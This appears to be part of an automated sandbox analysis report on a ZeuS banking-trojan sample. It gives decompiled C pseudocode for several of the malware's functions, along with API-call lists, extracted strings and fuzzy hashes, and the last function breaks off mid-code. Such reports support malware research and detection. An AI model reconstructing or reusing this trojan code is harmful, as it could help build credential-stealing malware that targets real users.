Part of subcall function 0040A91B: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040AA68

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Strings

&, xrefs: 00415271
#, xrefs: 0041527F

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 2f6e1e2129976daefbbc4e70f6e9333ca7324040863bd3caddfeb8f4eafd63f5
Instruction ID: 57393e65a262e405af10fd59cdcc93fa0be1ca7707a824fd6471059d0c6d1627
Opcode Fuzzy Hash: 2f6e1e2129976daefbbc4e70f6e9333ca7324040863bd3caddfeb8f4eafd63f5
Instruction Fuzzy Hash: 0F117076A01118BBDB209B96DC49FDFBF78EF81714F00406AF605B6180D3785B85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041CF7B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041CF7B(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E0040F34A(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E0040F314(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E0040F34A(0xd5,  &_v92);
					_push(0x1e6);
					_push("0xF52BE0F5");
					if(E00405F54( &_v8, _t32, 0x2000809) > 0) {
						 *_t28(0, _v8, E00404BB0, 0x10040);
						E004051E6(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

0x0041cf82
0x0041cf8a
0x0041cf98
0x0041cf9c
0x0041cfa3
0x0041cfab
0x0041cfba
0x0041cfbe
0x0041cff3
0x0041cff3
0x0041d012
0x00000000
0x0041d012
0x0041cfc0
0x0041cfc4
0x0041cfcc
0x0041cfd1
0x0041cfd6
0x0041cff1
0x0041d006
0x0041d00b
0x0041d010
0x00000000
0x0041d010
0x00000000
0x0041cff1
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 0041CF92
GetProcAddress.KERNEL32(00000000,?), ref: 0041CFB4

Strings

0xF52BE0F5, xrefs: 0041CFD6

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: 0xF52BE0F5
API String ID: 1646373207-3323659948
Opcode ID: e1c50757277fa203787e9e278e1edd06f2cf3a0e613258fd7d3f2481e2aec14f
Instruction ID: 5e487ba10198d4c49d809f9eb81f5b8d2071b52fedbe5d24876568ebb921d83f
Opcode Fuzzy Hash: e1c50757277fa203787e9e278e1edd06f2cf3a0e613258fd7d3f2481e2aec14f
Instruction Fuzzy Hash: 8601F976A4025077DF206AA59C06BDF3B78DB88714F000072FE01F72C1DA7CEE0695A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC9C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041CC9C(void* __ecx, WCHAR* __edi, void* __esi, signed int _a4) {
				char _v104;
				char _v154;
				char _v174;
				char _v194;
				char _v592;
				signed int _t13;
				int _t15;
				WCHAR* _t18;
				char* _t21;
				WCHAR* _t22;
				void* _t23;

				_t23 = __esi;
				_t22 = __edi;
				 *__edi = 0;
				E0041CC4A(__ecx,  &_v592);
				_t13 = _a4;
				if(_t13 == 0) {
					L6:
					_t21 =  &_v174;
					goto L7;
				} else {
					_t13 = _t13 - 1;
					if(_t13 == 0) {
						_t21 =  &_v194;
						L7:
						_t18 = 0x423a10;
						goto L8;
					} else {
						_t13 = _t13 - 1;
						if(_t13 == 0) {
							goto L6;
						} else {
							_t15 = _t13 - 1;
							if(_t15 == 0) {
								_t18 = L"SOFTWARE\\Microsoft";
								_t21 =  &_v154;
								L8:
								_push(_t23);
								_t15 = E004053F1(_t13 | 0xffffffff, _t21,  &_v104, 0, 0x32);
								if(_t15 != 0) {
									_t15 = E0040AA77( &_v104, _t22, _t18);
									if(_t15 == 0) {
										L12:
										_t15 = 0;
										 *_t22 = 0;
									} else {
										if(_a4 == 0) {
											_t15 = PathRenameExtensionW(_t22, L".dat");
											if(_t15 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t15;
			}

0x0041cc9c
0x0041cc9c
0x0041cca7
0x0041ccb2
0x0041ccba
0x0041ccbd
0x0041ccdd
0x0041ccdd
0x00000000
0x0041ccbf
0x0041ccbf
0x0041ccc0
0x0041ccd5
0x0041cce3
0x0041cce3
0x00000000
0x0041ccc2
0x0041ccc2
0x0041ccc3
0x00000000
0x0041ccc5
0x0041ccc5
0x0041ccc6
0x0041ccc8
0x0041cccd
0x0041cce8
0x0041cce8
0x0041ccf3
0x0041ccfb
0x0041cd02
0x0041cd09
0x0041cd21
0x0041cd21
0x0041cd23
0x0041cd0b
0x0041cd0f
0x0041cd17
0x0041cd1f
0x00000000
0x00000000
0x0041cd1f
0x0041cd0f
0x0041cd09
0x0041ccfb
0x0041ccc6
0x0041ccc3
0x0041ccc0
0x0041cd28

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,00423A10,00000032,77E49EB0,?,00000000), ref: 0041CD17

Strings

.dat, xrefs: 0041CD11
SOFTWARE\Microsoft, xrefs: 0041CCC8

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft
API String ID: 3337224433-47915998
Opcode ID: 959c06ef34028d00c16f7444816818665c862f816e947b98c22ce699c3b874dd
Instruction ID: 6c8aab1e06ea9ca908a7e166dfaf49000adbd0f1c6ea6aca4052e4c55400e514
Opcode Fuzzy Hash: 959c06ef34028d00c16f7444816818665c862f816e947b98c22ce699c3b874dd
Instruction Fuzzy Hash: 8C01963069030996DB20DB68DCC1BEB37A8EB11394F104037E409F61C1E73C9E82C69D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A569, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040A569(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t20;
				void* _t21;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t20 = 0;
				while(1) {
					_push(_a4);
					_push(E0040651F());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E00405ED9(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t21 = _t21 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E0040AA77(_t19, _a8,  &_v524) == 0 || E0040A39D(_a8, 0, 0) == 0) {
						_t20 = _t20 + 1;
						if(_t20 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0040a58c
0x0040a5e6
0x00000000
0x0040a5e6
0x0040a58e
0x0040a590
0x0040a590
0x0040a598
0x0040a599
0x0040a5a8
0x0040a5ae
0x0040a5b3
0x0040a5b9
0x00000000
0x00000000
0x0040a5ce
0x0040a5e0
0x0040a5e4
0x00000000
0x00000000
0x00000000
0x0040a5ee
0x00000000
0x0040a5ee
0x0040a5ce
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0040A580

Part of subcall function 0040651F: GetTickCount.KERNEL32 ref: 0040651F

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

Part of subcall function 0040A39D: CreateFileW.KERNEL32(00406CC0,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3B7
Part of subcall function 0040A39D: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3DA
Part of subcall function 0040A39D: CloseHandle.KERNEL32(00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3E7

Strings

tmp, xrefs: 0040A599
%s%08x.%s, xrefs: 0040A59E

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: 661b2a8b8ca0fc6cc245dd7901bf68b3eea6e28c20f9fc2e77374e8eb8893d3a
Instruction ID: 080e7e9b51f920111718eb95920d5d5a073a3d979218899ddd6f8df9b04652d0
Opcode Fuzzy Hash: 661b2a8b8ca0fc6cc245dd7901bf68b3eea6e28c20f9fc2e77374e8eb8893d3a
Instruction Fuzzy Hash: 40017D3120031436DF20BA20DC06BEF7718EB01768F104133FD25BA1E2C2798EA6869E

Uniqueness

Uniqueness Score: -1.00%

Function 00408DBA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DBA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0040A548( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E00405365(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E00405222(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x00408dce
0x00408de4
0x00408dfe
0x00408e04
0x00408e18
0x00408e25
0x00408e2c
0x00408e30
0x00408e31
0x00408e36

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00408DDC

Part of subcall function 0040A548: SetFileAttributesW.KERNEL32(00000080,00000080,0040F748,?), ref: 0040A551
Part of subcall function 0040A548: DeleteFileW.KERNEL32(?), ref: 0040A55B

PathFindFileNameW.SHLWAPI(?,?,?), ref: 00408DFE

Part of subcall function 00405365: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040605D,00000000,00000000,00000000,004053C2,00000000,00000000,00000000,?,00000000), ref: 00405380

Strings

cab, xrefs: 00408DD1

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: 498181ec137a2167c1af2ebe2f9c1b86589f91e84d53eb2209bac8434ed75fec
Instruction ID: bbd98da86b9023202aea280e640d21bb16665ebd0969d1a8156627a174fcde3d
Opcode Fuzzy Hash: 498181ec137a2167c1af2ebe2f9c1b86589f91e84d53eb2209bac8434ed75fec
Instruction Fuzzy Hash: B201A73660031467CB10AA78DC4EF8777ACAF04755F004265B969F31D1DA78E9048A94

Uniqueness

Uniqueness Score: -1.00%

Function 0040C077, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040C077(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E004088D5(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E00405F54( &_a4, L"\"%s\"", _a16) > 0) {
								E00406B08(_t27, _a4);
								E004051E6(_a4);
							}
						}
						E004051E6(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x0040c081
0x0040c086
0x0040c091
0x0040c095
0x0040c0a4
0x0040c0aa
0x0040c0c0
0x0040c0c6
0x0040c0ce
0x0040c0ce
0x0040c0d3
0x0040c0d5
0x0040c0d5
0x00000000
0x0040c0e3
0x0040c0e5

APIs

Part of subcall function 004088D5: GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,0040681F,00000001,?,?,0041C79F,000000FF,004239C0), ref: 004088EE
Part of subcall function 004088D5: GetLastError.KERNEL32(?,?,0040681F,00000001,?,?,0041C79F,000000FF,004239C0), ref: 004088F4
Part of subcall function 004088D5: GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,0040681F,00000001,?,?,0041C79F,000000FF,004239C0), ref: 0040891A

EqualSid.ADVAPI32(00000000,0040C1F0,?,0040C1F0,?,?,00000000), ref: 0040C09C

Part of subcall function 00406B08: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00406B19
Part of subcall function 00406B08: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00406B38
Part of subcall function 00406B08: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00406B44
Part of subcall function 00406B08: CreateProcessAsUserW.ADVAPI32(?,00000000,0040C0CB,00000000,00000000,00000000,0040C0CB,0040C0CB,00000000,?,?,?,00000000,00000044), ref: 00406BB5
Part of subcall function 00406B08: CloseHandle.KERNEL32(?), ref: 00406BC8
Part of subcall function 00406B08: CloseHandle.KERNEL32(?), ref: 00406BCD
Part of subcall function 00406B08: FreeLibrary.KERNEL32(?), ref: 00406BE4

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

CloseHandle.KERNEL32(?,?,0040C1F0,?,?,00000000), ref: 0040C0DD

Strings

"%s", xrefs: 0040C0B0

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: d81098550d816526a83a5eeb3323a7e5280b189ee3efe8292ae97e88d75798e7
Instruction ID: 5f0b570150c15766f1ad5c2685fb700982de5592406f2952f451c2c7d3ec752a
Opcode Fuzzy Hash: d81098550d816526a83a5eeb3323a7e5280b189ee3efe8292ae97e88d75798e7
Instruction Fuzzy Hash: E1F0FB32500109FBCF116FA1EC45E9F3F6AEF44354B048136BD09B91A1DB39DA60EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F126, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

GetCurrentThreadId.KERNEL32 ref: 0040F159
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040F163

Strings

82B, xrefs: 0040F149

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Thread$CurrentObjectProcessSingleWaitWindow
String ID: 82B
API String ID: 419583955-2694519287
Opcode ID: 74c869487249245d1ba1056a90bb747a331391252844493eebdf09c22e27878f
Instruction ID: b75270d975fbd47235fa7c85e0a14fd1a77e46c7eaa87290c9d2976d102ccb3e
Opcode Fuzzy Hash: 74c869487249245d1ba1056a90bb747a331391252844493eebdf09c22e27878f
Instruction Fuzzy Hash: CEF0A733201630E6C2316ABBFC88DDB9B69DD867F53508477F20CBAA51D2384C4982F9

Uniqueness

Uniqueness Score: -1.00%

Function 004072AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004072AF(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t26;

				_t26 = 0;
				_v56 = 0x101;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E0040722E();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E004070FC( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E004051E6(_v44);
				return _t26;
			}

0x004072b7
0x004072ba
0x004072c0
0x004072c3
0x004072d1
0x004072d4
0x004072db
0x004072de
0x004072e1
0x004072e4
0x004072e7
0x004072ea
0x004072f1
0x004072fa
0x00407304
0x0040730a
0x0040730a
0x00407310
0x0040731b

APIs

Part of subcall function 0040722E: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040723F
Part of subcall function 0040722E: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00407252
Part of subcall function 0040722E: FreeLibrary.KERNEL32(?), ref: 004072A4

GetTickCount.KERNEL32 ref: 004072F4

Part of subcall function 004070FC: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 00407150
Part of subcall function 004070FC: InternetCloseHandle.WININET(00000000), ref: 004071E9

GetTickCount.KERNEL32 ref: 00407306

Strings

http://www.google.com/webhp, xrefs: 004072D4

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: b15b2d826bd8b4cf6d748a82818e30600fff39aea3dbba0ae6b248fdd392da7c
Instruction ID: 3d8d7f1564369bc37c0409ce0b2ea30e479f038e55c8597adf02c196dd255389
Opcode Fuzzy Hash: b15b2d826bd8b4cf6d748a82818e30600fff39aea3dbba0ae6b248fdd392da7c
Instruction Fuzzy Hash: FF01D6B1D11228AACF00DFE9E9455DEFBB8AF08748F10416BE900B7254D3B45A058FE9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F1D0(void* __eax) {
				void* __ebx;
				long _t8;
				intOrPtr _t16;
				struct HWND__* _t19;

				if(__eax + 0x423a06 == 0 || E0041CAA4() == 0) {
					return GetCapture();
				}
				_t8 = GetCurrentThreadId();
				_t16 =  *0x423248;
				if( *((intOrPtr*)(_t16 + 0x10c)) != _t8) {
					L6:
					return 0;
				} else {
					_t19 =  *(_t16 + 0x108);
					if(_t19 == 0 || IsWindow(_t19) != 0) {
						return _t19;
					} else {
						E0040E862(0, 0x423238, _t11, _t11, _t11);
						goto L6;
					}
				}
			}

0x0040f1d7
0x0040f225
0x0040f225
0x0040f1e2
0x0040f1e8
0x0040f1f4
0x0040f21c
0x0040f21f
0x0040f1f6
0x0040f1f6
0x0040f1fe
0x0040f223
0x0040f20b
0x0040f216
0x00000000
0x0040f21b
0x0040f1fe

APIs

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

GetCurrentThreadId.KERNEL32 ref: 0040F1E2
IsWindow.USER32(?), ref: 0040F201

Part of subcall function 0040E862: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040EC9B,00000000), ref: 0040E868
Part of subcall function 0040E862: ReleaseMutex.KERNEL32(?), ref: 0040E89C
Part of subcall function 0040E862: IsWindow.USER32(?), ref: 0040E8A3
Part of subcall function 0040E862: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040E8BD

Strings

82B, xrefs: 0040F211

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: ObjectSingleWaitWindow$CurrentMessageMutexPostReleaseThread
String ID: 82B
API String ID: 904989000-2694519287
Opcode ID: 89b7b07eba3e213a853107aa0b81bd94ddfede516d858cec04a4b2637724af59
Instruction ID: e2cfca34dec983628dce6c367dbe96c77e3d655ba249be4a733720ff305035e4
Opcode Fuzzy Hash: 89b7b07eba3e213a853107aa0b81bd94ddfede516d858cec04a4b2637724af59
Instruction Fuzzy Hash: F1F0A736600020ABC760EFA57C446EA6359DB0570570944FFE804F7661D33A4C8645AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040F180, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F180(void* __eax, void* __ecx) {
				void* __ebx;
				void* __esi;

				if(E0041CAA4() == 0) {
					return ReleaseCapture();
				}
				if( *((intOrPtr*)( *0x423248 + 0x10c)) != GetCurrentThreadId()) {
					SetLastError(5);
					return 0;
				} else {
					E0040E862(0, 0x423238, 0, 0, 0);
					return 1;
				}
			}

0x0040f18f
0x0040f1c9
0x0040f1c9
0x0040f1a3
0x0040f1c0
0x0040f1c8
0x0040f1a5
0x0040f1b3
0x0040f1bd
0x0040f1bd

APIs

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

GetCurrentThreadId.KERNEL32 ref: 0040F191
SetLastError.KERNEL32(00000005), ref: 0040F1C0

Part of subcall function 0040E862: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040EC9B,00000000), ref: 0040E868
Part of subcall function 0040E862: ReleaseMutex.KERNEL32(?), ref: 0040E89C
Part of subcall function 0040E862: IsWindow.USER32(?), ref: 0040E8A3
Part of subcall function 0040E862: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040E8BD

Strings

82B, xrefs: 0040F1AE

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: ObjectSingleWait$CurrentErrorLastMessageMutexPostReleaseThreadWindow
String ID: 82B
API String ID: 2244431463-2694519287
Opcode ID: 741a29d290f118c0105207ee80034e95639e7727668a51d0193c9c0fbd98b527
Instruction ID: 7a585e3e00d8bdd23cf52b68934e73bb5f0fb3b8a94c514dd06c01f402a0b9e1
Opcode Fuzzy Hash: 741a29d290f118c0105207ee80034e95639e7727668a51d0193c9c0fbd98b527
Instruction Fuzzy Hash: 14E0D871210100EFD710AFB1AD406A32369EB45306B5444BAF945EA161D7398C454968

Uniqueness

Uniqueness Score: -1.00%

Function 00414FBC, Relevance: 5.2, APIs: 4, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00414FBC(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t82;
				char* _t83;
				intOrPtr _t85;
				char** _t101;
				char* _t112;
				char* _t121;
				char* _t122;
				void* _t123;
				char* _t126;
				char* _t127;
				char* _t156;
				void* _t157;
				signed int _t166;
				char* _t167;
				char** _t168;
				intOrPtr _t170;
				char* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x294;
				if(E0040AA77( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t177 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t82 = 2;
					_t83 = E0040A402(_t82,  &_v524,  &_v612);
					__eflags = _t83;
					if(_t83 == 0) {
						goto L31;
					}
					_t85 = E00405A81(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t85;
					__eflags = _t85 - 0xffffffff;
					if(_t85 == 0xffffffff) {
						L30:
						E0040A4AA( &_v612);
						goto L31;
					}
					_v640 = E004051B6(0x622);
					E0040F314(0x91,  &_v588);
					E0040F314(0x92,  &_v628);
					E0040F314(0x93,  &_v620);
					E0040F314(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E004051E6(_v640);
						E00405202(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t166 = _v644;
							_t101 = _v652;
							__eflags =  *(_t101 + _t166 * 4);
							if( *(_t101 + _t166 * 4) == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
							__eflags = _v676;
							_t167 = _t112;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t168 =  &(_t167[0xa]);
							_v652 = _t168;
							E00414FA2();
							E00414FA2();
							E00414FA2();
							__eflags = _t156;
							if(_t156 == 0) {
								L15:
								_t157 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t121 =  *_t168;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L28;
								}
								__eflags = _t121 - 0x30;
								if(_t121 == 0x30) {
									L21:
									__eflags = _t168[0];
									if(_t168[0] == 0) {
										goto L28;
									}
